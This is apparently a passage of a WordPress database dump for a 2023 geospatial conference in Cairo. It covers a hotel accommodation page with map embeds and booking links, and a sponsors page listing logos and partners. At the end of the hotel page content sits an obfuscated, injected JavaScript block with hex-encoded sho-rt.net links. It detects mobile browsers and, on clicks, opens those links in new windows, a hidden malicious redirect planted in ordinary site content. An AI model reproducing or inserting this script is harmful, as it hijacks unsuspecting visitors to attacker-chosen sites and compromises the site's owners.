src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 14pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\"><span style=\"font-size: 24pt;\">BOOK NOW </span> </a></strong></span></h2>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 14pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\n<h1 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 24pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\">BOOK NOW</a></strong></span></h1>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.01)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\n<ul>\n<li><strong><span style=\"font-size: 12pt; color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></span></strong></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-08-02 14:45:54','2023-08-02 14:45:54','',2685,'https://gsw2023.com/?p=5081',0,'revision','',0),
(5083,1,'2023-08-07 12:54:12','2023-08-07 12:54:12','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" 